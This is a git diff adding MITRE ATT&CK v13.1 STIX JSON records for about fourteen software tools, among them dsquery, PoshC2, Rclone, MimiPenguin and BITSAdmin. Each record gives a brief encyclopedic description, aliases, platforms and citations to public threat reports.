@@ -0,0 +1,49 @@ +{ + "type": "bundle", + "id": "bundle--c73326fc-1ff9-44ca-8ded-88cd828559dc", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-01-04T18:56:27.812Z", + "name": "dsquery", + "description": "[dsquery](https://attack.mitre.org/software/S0105) is a command-line utility that can be used to query Active Directory for information from a system within a domain. (Citation: TechNet Dsquery) It is typically installed only on Windows Server versions but can be installed on non-server variants through the Microsoft-provided Remote Server Administration Tools bundle.", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_version": "1.4", + "x_mitre_aliases": [ + "dsquery", + "dsquery.exe" + ], + "type": "tool", + "id": "tool--38952eac-cb1b-4a71-bad2-ee8223a1c8fe", + "created": "2017-05-31T21:33:04.937Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0105", + "external_id": "S0105" + }, + { + "source_name": "TechNet Dsquery", + "description": "Microsoft. (n.d.). Dsquery. Retrieved April 18, 2016.", + "url": "https://technet.microsoft.com/en-us/library/cc732952.aspx" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "labels": [ + "tool" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--3a53b207-aba2-4a2b-9cdb-273d633669e7.json b/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--3a53b207-aba2-4a2b-9cdb-273d633669e7.json new file mode 100644 index 0000000000000000000000000000000000000000..d4a13bde52a99f37fd3de5e0c81f329f861a639e --- /dev/null 
+++ b/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--3a53b207-aba2-4a2b-9cdb-273d633669e7.json @@ -0,0 +1,53 @@ +{ + "type": "bundle", + "id": "bundle--8fbee6c6-c7be-44ed-89cf-77c60b1b6f90", + "spec_version": "2.0", + "objects": [ + { + "modified": "2022-10-13T14:12:41.582Z", + "name": "PcShare", + "description": "[PcShare](https://attack.mitre.org/software/S1050) is an open source remote access tool that has been modified and used by Chinese threat actors, most notably during the FunnyDream campaign since late 2018.(Citation: Bitdefender FunnyDream Campaign November 2020)(Citation: GitHub PcShare 2014)", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_aliases": [ + "PcShare" + ], + "type": "tool", + "id": "tool--3a53b207-aba2-4a2b-9cdb-273d633669e7", + "created": "2022-10-13T14:07:52.541Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S1050", + "external_id": "S1050" + }, + { + "source_name": "GitHub PcShare 2014", + "description": "LiveMirror. (2014, September 17). PcShare. Retrieved October 11, 2022.", + "url": "https://github.com/LiveMirror/pcshare" + }, + { + "source_name": "Bitdefender FunnyDream Campaign November 2020", + "description": "Vrabie, V. (2020, November). Dissecting a Chinese APT Targeting South Eastern Asian Government Institutions. Retrieved September 19, 2022.", + "url": "https://www.bitdefender.com/files/News/CaseStudies/study/379/Bitdefender-Whitepaper-Chinese-APT.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "labels": [ + "tool" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file 
diff --git a/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--3ffbdc1f-d2bf-41ab-91a2-c7b857e98079.json b/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--3ffbdc1f-d2bf-41ab-91a2-c7b857e98079.json new file mode 100644 index 0000000000000000000000000000000000000000..5b4230beece10bc49ecb627d1c6175ad9c0e5e66 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--3ffbdc1f-d2bf-41ab-91a2-c7b857e98079.json 
@@ -0,0 +1,53 @@ +{ + "type": "bundle", + "id": "bundle--ec49eb56-489b-4df0-847a-a6bb9d795ddd", + "spec_version": "2.0", + "objects": [ + { + "labels": [ + "tool" + ], + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_aliases": [ + "RawDisk" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "tool", + "id": "tool--3ffbdc1f-d2bf-41ab-91a2-c7b857e98079", + "created": "2019-03-25T12:30:40.919Z", + "x_mitre_version": "1.0", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "S0364", + "url": "https://attack.mitre.org/software/S0364" + }, + { + "source_name": "EldoS RawDisk ITpro", + "url": "https://www.itprotoday.com/windows-78/eldos-provides-raw-disk-access-vista-and-xp", + "description": "Edwards, M. (2007, March 14). EldoS Provides Raw Disk Access for Vista and XP. Retrieved March 26, 2019." + }, + { + "source_name": "Novetta Blockbuster Destructive Malware", + "url": "https://web.archive.org/web/20160303200515/https://operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Destructive-Malware-Report.pdf", + "description": "Novetta Threat Research Group. (2016, February 24). Operation Blockbuster: Destructive Malware Report. Retrieved March 2, 2016." + } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "[RawDisk](https://attack.mitre.org/software/S0364) is a legitimate commercial driver from the EldoS Corporation that is used for interacting with files, disks, and partitions. The driver allows for direct modification of data on a local computer's hard drive. 
In some cases, the tool can enact these raw disk modifications from user-mode processes, circumventing Windows operating system security features.(Citation: EldoS RawDisk ITpro)(Citation: Novetta Blockbuster Destructive Malware)", + "modified": "2022-07-28T18:55:35.991Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "RawDisk", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--4664b683-f578-434f-919b-1c1aad2a1111.json b/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--4664b683-f578-434f-919b-1c1aad2a1111.json new file mode 100644 index 0000000000000000000000000000000000000000..282ba186431bcbbb5d0f7ea76735f86907876e35 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--4664b683-f578-434f-919b-1c1aad2a1111.json 
@@ -0,0 +1,45 @@ +{ + "type": "bundle", + "id": "bundle--cc5328f2-0a69-4299-9f15-b670888189dc", + "spec_version": "2.0", + "objects": [ + { + "modified": "2022-10-12T21:29:16.407Z", + "name": "netstat", + "description": "[netstat](https://attack.mitre.org/software/S0104) is an operating system utility that displays active TCP connections, listening ports, and network statistics. (Citation: TechNet Netstat)", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_version": "1.1", + "x_mitre_aliases": [ + "netstat" + ], + "type": "tool", + "id": "tool--4664b683-f578-434f-919b-1c1aad2a1111", + "created": "2017-05-31T21:33:04.545Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0104", + "external_id": "S0104" + }, + { + "source_name": "TechNet Netstat", + "description": "Microsoft. (n.d.). Netstat. Retrieved April 17, 2016.", + "url": "https://technet.microsoft.com/en-us/library/bb490947.aspx" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "labels": [ + "tool" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--4b57c098-f043-4da2-83ef-7588a6d426bc.json b/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--4b57c098-f043-4da2-83ef-7588a6d426bc.json new file mode 100644 index 0000000000000000000000000000000000000000..701d1cacf9afac0e0d5a065fa4181782a9a8a133 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--4b57c098-f043-4da2-83ef-7588a6d426bc.json 
@@ -0,0 +1,50 @@ +{ + "type": "bundle", + "id": "bundle--01108eb1-ac00-4f55-b94a-f0c876521716", + "spec_version": "2.0", + "objects": [ + { + "labels": [ + "tool" + ], + "x_mitre_platforms": [ + "Windows", + "Linux", + "macOS" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_aliases": [ + "PoshC2" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "tool", + "id": "tool--4b57c098-f043-4da2-83ef-7588a6d426bc", + "created": "2019-04-23T12:31:58.125Z", + "x_mitre_version": "1.3", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "S0378", + "url": "https://attack.mitre.org/software/S0378" + }, + { + "source_name": "GitHub PoshC2", + "url": "https://github.com/nettitude/PoshC2_Python", + "description": "Nettitude. (2018, July 23). Python Server for PoshC2. Retrieved April 23, 2019." + } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "[PoshC2](https://attack.mitre.org/software/S0378) is an open source remote administration and post-exploitation framework that is publicly available on GitHub. The server-side components of the tool are primarily written in Python, while the implants are written in [PowerShell](https://attack.mitre.org/techniques/T1059/001). Although [PoshC2](https://attack.mitre.org/software/S0378) is primarily focused on Windows implantation, it does contain a basic Python dropper for Linux/macOS.(Citation: GitHub PoshC2)", + "modified": "2022-06-03T17:45:36.186Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "PoshC2", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file 
diff --git a/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--4f45dfeb-fe51-4df0-8db3-edf7dd0513fe.json b/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--4f45dfeb-fe51-4df0-8db3-edf7dd0513fe.json new file mode 100644 index 0000000000000000000000000000000000000000..6042451afca46e5563bcac4ba797e8283c6c5398 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--4f45dfeb-fe51-4df0-8db3-edf7dd0513fe.json @@ -0,0 +1,46 @@ +{ + "type": "bundle", + "id": "bundle--0b701fb9-13e0-4b99-9743-91024b61a17a", + "spec_version": "2.0", + "objects": [ + { + "labels": [ + "tool" + ], + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_aliases": [ + "Fgdump" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "tool--4f45dfeb-fe51-4df0-8db3-edf7dd0513fe", + "type": "tool", + "created": "2017-05-31T21:33:10.569Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0120", + "external_id": "S0120" + }, + { + "source_name": "Mandiant APT1", + "description": "Mandiant. (n.d.). APT1 Exposing One of China\u2019s Cyber Espionage Units. Retrieved July 18, 2016.", + "url": "https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report.pdf" + } + ], + "modified": "2020-03-30T16:40:33.738Z", + "name": "Fgdump", + "description": "[Fgdump](https://attack.mitre.org/software/S0120) is a Windows password hash dumper. (Citation: Mandiant APT1)", + "x_mitre_version": "1.1", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file 
diff --git a/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--4fa49fc0-9162-4bdb-a37e-7aa3dcb6d38b.json b/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--4fa49fc0-9162-4bdb-a37e-7aa3dcb6d38b.json new file mode 100644 index 0000000000000000000000000000000000000000..9ed4c089f9c3a4bf2e4f4b2a15491a039e378509 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--4fa49fc0-9162-4bdb-a37e-7aa3dcb6d38b.json @@ -0,0 +1,40 @@ +{ + "type": "bundle", + "id": "bundle--a4c7b502-291a-431d-b0bb-e33f7da84475", + "spec_version": "2.0", + "objects": [ + { + "labels": [ + "tool" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "tool--4fa49fc0-9162-4bdb-a37e-7aa3dcb6d38b", + "type": "tool", + "created": "2017-05-31T21:33:11.941Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0123", + "external_id": "S0123" + }, + { + "source_name": "xCmd", + "description": "Rayaprolu, A.. (2011, April 12). xCmd an Alternative to PsExec. Retrieved August 10, 2016.", + "url": "https://ashwinrayaprolu.wordpress.com/2011/04/12/xcmd-an-alternative-to-psexec/" + } + ], + "modified": "2018-10-17T00:14:20.652Z", + "name": "xCmd", + "description": "[xCmd](https://attack.mitre.org/software/S0123) is an open source tool that is similar to [PsExec](https://attack.mitre.org/software/S0029) and allows the user to execute applications on remote systems. (Citation: xCmd)", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file 
diff --git a/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--5256c0f8-9108-4c92-8b09-482dfacdcd94.json b/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--5256c0f8-9108-4c92-8b09-482dfacdcd94.json new file mode 100644 index 0000000000000000000000000000000000000000..2e5006abdad168c995ab2dac16cd5f1aed75d60c --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--5256c0f8-9108-4c92-8b09-482dfacdcd94.json 
@@ -0,0 +1,48 @@ +{ + "type": "bundle", + "id": "bundle--d47a9069-154d-43a3-941c-c9225a8f1954", + "spec_version": "2.0", + "objects": [ + { + "modified": "2022-10-18T23:14:56.867Z", + "name": "CSPY Downloader", + "description": "[CSPY Downloader](https://attack.mitre.org/software/S0527) is a tool designed to evade analysis and download additional payloads used by [Kimsuky](https://attack.mitre.org/groups/G0094).(Citation: Cybereason Kimsuky November 2020)", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_aliases": [ + "CSPY Downloader" + ], + "type": "tool", + "id": "tool--5256c0f8-9108-4c92-8b09-482dfacdcd94", + "created": "2020-11-09T14:30:35.202Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0527", + "external_id": "S0527" + }, + { + "source_name": "Cybereason Kimsuky November 2020", + "description": "Dahan, A. et al. (2020, November 2). Back to the Future: Inside the Kimsuky KGH Spyware Suite. Retrieved November 6, 2020.", + "url": "https://www.cybereason.com/blog/back-to-the-future-inside-the-kimsuky-kgh-spyware-suite" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "labels": [ + "tool" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--59096109-a1dd-463b-87e7-a8d110fe3a79.json b/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--59096109-a1dd-463b-87e7-a8d110fe3a79.json new file mode 100644 index 0000000000000000000000000000000000000000..2d89fd7d18065820d246daaccdd4bc6ecc24192a --- /dev/null 
+++ b/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--59096109-a1dd-463b-87e7-a8d110fe3a79.json 
@@ -0,0 +1,74 @@ +{ + "type": "bundle", + "id": "bundle--35151991-e7f7-439b-a336-8a3dd7b9b7c6", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-04-13T13:14:41.257Z", + "name": "Rclone", + "description": "[Rclone](https://attack.mitre.org/software/S1040) is a command line program for syncing files with cloud storage services such as Dropbox, Google Drive, Amazon S3, and MEGA. [Rclone](https://attack.mitre.org/software/S1040) has been used in a number of ransomware campaigns, including those associated with the [Conti](https://attack.mitre.org/software/S0575) and DarkSide Ransomware-as-a-Service operations.(Citation: Rclone)(Citation: Rclone Wars)(Citation: Detecting Rclone)(Citation: DarkSide Ransomware Gang)(Citation: DFIR Conti Bazar Nov 2021)", + "x_mitre_platforms": [ + "Linux", + "Windows", + "macOS" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_contributors": [ + "Edward Millington", + "Ian McKay" + ], + "x_mitre_aliases": [ + "Rclone" + ], + "type": "tool", + "id": "tool--59096109-a1dd-463b-87e7-a8d110fe3a79", + "created": "2022-08-30T13:02:36.422Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S1040", + "external_id": "S1040" + }, + { + "source_name": "Detecting Rclone", + "description": " Aaron Greetham. (2021, May 27). Detecting Rclone \u2013 An Effective Tool for Exfiltration. Retrieved August 30, 2022.", + "url": "https://research.nccgroup.com/2021/05/27/detecting-rclone-an-effective-tool-for-exfiltration/" + }, + { + "source_name": "DFIR Conti Bazar Nov 2021", + "description": "DFIR Report. (2021, November 29). CONTInuing the Bazar Ransomware Story. 
Retrieved September 29, 2022.", + "url": "https://thedfirreport.com/2021/11/29/continuing-the-bazar-ransomware-story/" + }, + { + "source_name": "Rclone Wars", + "description": "Justin Schoenfeld and Aaron Didier. (2021, May 4). Rclone Wars: Transferring leverage in a ransomware attack. Retrieved August 30, 2022.", + "url": "https://redcanary.com/blog/rclone-mega-extortion/" + }, + { + "source_name": "Rclone", + "description": "Nick Craig-Wood. (n.d.). Rclone syncs your files to cloud storage. Retrieved August 30, 2022.", + "url": "https://rclone.org" + }, + { + "source_name": "DarkSide Ransomware Gang", + "description": "Ramarcus Baylor. (2021, May 12). DarkSide Ransomware Gang: An Overview. Retrieved August 30, 2022.", + "url": "https://unit42.paloaltonetworks.com/darkside-ransomware/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "labels": [ + "tool" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--5a33468d-844d-4b1f-98c9-0e786c556b27.json b/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--5a33468d-844d-4b1f-98c9-0e786c556b27.json new file mode 100644 index 0000000000000000000000000000000000000000..c95498894c19e20f0167d250a69e63ca7a76bb6f --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--5a33468d-844d-4b1f-98c9-0e786c556b27.json 
@@ -0,0 +1,49 @@ +{ + "type": "bundle", + "id": "bundle--97d8a61c-73b0-4bfb-9848-7b693637cbdd", + "spec_version": "2.0", + "objects": [ + { + "labels": [ + "tool" + ], + "x_mitre_platforms": [ + "Linux" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_contributors": [ + "Vincent Le Toux" + ], + "x_mitre_aliases": [ + "MimiPenguin" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "tool--5a33468d-844d-4b1f-98c9-0e786c556b27", + "type": "tool", + "created": "2018-01-16T16:13:52.465Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0179", + "external_id": "S0179" + }, + { + "source_name": "MimiPenguin GitHub May 2017", + "description": "Gregal, H. (2017, May 12). MimiPenguin. Retrieved December 5, 2017.", + "url": "https://github.com/huntergregal/mimipenguin" + } + ], + "modified": "2021-10-15T16:57:34.776Z", + "name": "MimiPenguin", + "description": "[MimiPenguin](https://attack.mitre.org/software/S0179) is a credential dumper, similar to [Mimikatz](https://attack.mitre.org/software/S0002), designed specifically for Linux platforms. (Citation: MimiPenguin GitHub May 2017)", + "x_mitre_version": "1.2", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--5a63f900-5e7e-4928-a746-dd4558e1df71.json b/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--5a63f900-5e7e-4928-a746-dd4558e1df71.json new file mode 100644 index 0000000000000000000000000000000000000000..91520e5fd4a04497cb3f077bbf14e2e32fb4ac83 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--5a63f900-5e7e-4928-a746-dd4558e1df71.json 
@@ -0,0 +1,49 @@ +{ + "type": "bundle", + "id": "bundle--df5ca29b-416f-4157-9b52-1fd973bd1828", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-01-17T22:14:55.797Z", + "name": "netsh", + "description": "[netsh](https://attack.mitre.org/software/S0108) is a scripting utility used to interact with networking components on local or remote systems. (Citation: TechNet Netsh)", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_version": "1.2", + "x_mitre_aliases": [ + "netsh", + "netsh.exe" + ], + "type": "tool", + "id": "tool--5a63f900-5e7e-4928-a746-dd4558e1df71", + "created": "2017-05-31T21:33:06.083Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0108", + "external_id": "S0108" + }, + { + "source_name": "TechNet Netsh", + "description": "Microsoft. (n.d.). Using Netsh. Retrieved February 13, 2017.", + "url": "https://technet.microsoft.com/library/bb490939.aspx" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "labels": [ + "tool" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--5fc81b43-62b5-41b1-9113-c79ae5f030c4.json b/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--5fc81b43-62b5-41b1-9113-c79ae5f030c4.json new file mode 100644 index 0000000000000000000000000000000000000000..b0e9e090c0fbc07f2d554a02381774728533cc2f --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--5fc81b43-62b5-41b1-9113-c79ae5f030c4.json 
@@ -0,0 +1,46 @@ +{ + "type": "bundle", + "id": "bundle--64c9572e-1b2d-40af-ae24-542235aac2e5", + "spec_version": "2.0", + "objects": [ + { + "labels": [ + "tool" + ], + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_aliases": [ + "CARROTBALL" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "tool--5fc81b43-62b5-41b1-9113-c79ae5f030c4", + "type": "tool", + "created": "2020-06-02T19:10:29.513Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "S0465", + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0465" + }, + { + "source_name": "Unit 42 CARROTBAT January 2020", + "url": "https://unit42.paloaltonetworks.com/the-fractured-statue-campaign-u-s-government-targeted-in-spear-phishing-attacks/", + "description": "McCabe, A. (2020, January 23). The Fractured Statue Campaign: U.S. Government Agency Targeted in Spear-Phishing Attacks. Retrieved June 2, 2020." + } + ], + "modified": "2020-06-10T14:44:23.055Z", + "name": "CARROTBALL", + "description": "[CARROTBALL](https://attack.mitre.org/software/S0465) is an FTP downloader utility that has been in use since at least 2019. [CARROTBALL](https://attack.mitre.org/software/S0465) has been used as a downloader to install [SYSCON](https://attack.mitre.org/software/S0464).(Citation: Unit 42 CARROTBAT January 2020)", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--64764dc6-a032-495f-8250-1e4c06bdc163.json b/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--64764dc6-a032-495f-8250-1e4c06bdc163.json new file mode 100644 index 0000000000000000000000000000000000000000..eb044121736520837e4ee358fa04d6f8158b21b0 --- /dev/null 
+++ b/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--64764dc6-a032-495f-8250-1e4c06bdc163.json @@ -0,0 +1,51 @@ +{ + "type": "bundle", + "id": "bundle--1a8b4651-484f-4895-a68b-766ec3986769", + "spec_version": "2.0", + "objects": [ + { + "modified": "2022-10-13T18:56:28.568Z", + "name": "BITSAdmin", + "description": "[BITSAdmin](https://attack.mitre.org/software/S0190) is a command line tool used to create and manage [BITS Jobs](https://attack.mitre.org/techniques/T1197). (Citation: Microsoft BITSAdmin)", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_version": "1.3", + "x_mitre_contributors": [ + "Edward Millington" + ], + "x_mitre_aliases": [ + "BITSAdmin" + ], + "type": "tool", + "id": "tool--64764dc6-a032-495f-8250-1e4c06bdc163", + "created": "2018-04-18T17:59:24.739Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0190", + "external_id": "S0190" + }, + { + "source_name": "Microsoft BITSAdmin", + "description": "Microsoft. (n.d.). BITSAdmin Tool. Retrieved January 12, 2018.", + "url": "https://msdn.microsoft.com/library/aa362813.aspx" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "labels": [ + "tool" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--65370d0b-3bd4-4653-8cf9-daf56f6be830.json b/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--65370d0b-3bd4-4653-8cf9-daf56f6be830.json new file mode 100644 index 0000000000000000000000000000000000000000..5fc6e0a087ccd5842cbb99adba525258f67919e2 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--65370d0b-3bd4-4653-8cf9-daf56f6be830.json 
@@ -0,0 +1,43 @@ +{ + "type": "bundle", + "id": "bundle--06c360af-f00a-4b19-810b-84d1a9f5c704", + "spec_version": "2.0", + "objects": [ + { + "labels": [ + "tool" + ], + "x_mitre_platforms": [ + "Linux", + "Windows", + "macOS" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_aliases": [ + "meek" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "tool--65370d0b-3bd4-4653-8cf9-daf56f6be830", + "type": "tool", + "created": "2018-01-16T16:13:52.465Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0175", + "external_id": "S0175" + } + ], + "modified": "2021-02-09T23:00:38.683Z", + "name": "meek", + "description": "[meek](https://attack.mitre.org/software/S0175) is an open-source Tor plugin that tunnels Tor traffic through HTTPS connections.", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--6dbdc657-d8e0-4f2f-909b-7251b3e72c6d.json b/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--6dbdc657-d8e0-4f2f-909b-7251b3e72c6d.json new file mode 100644 index 0000000000000000000000000000000000000000..e72a39a4b7bb038ccbbdcad1289e51420107c827 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--6dbdc657-d8e0-4f2f-909b-7251b3e72c6d.json 
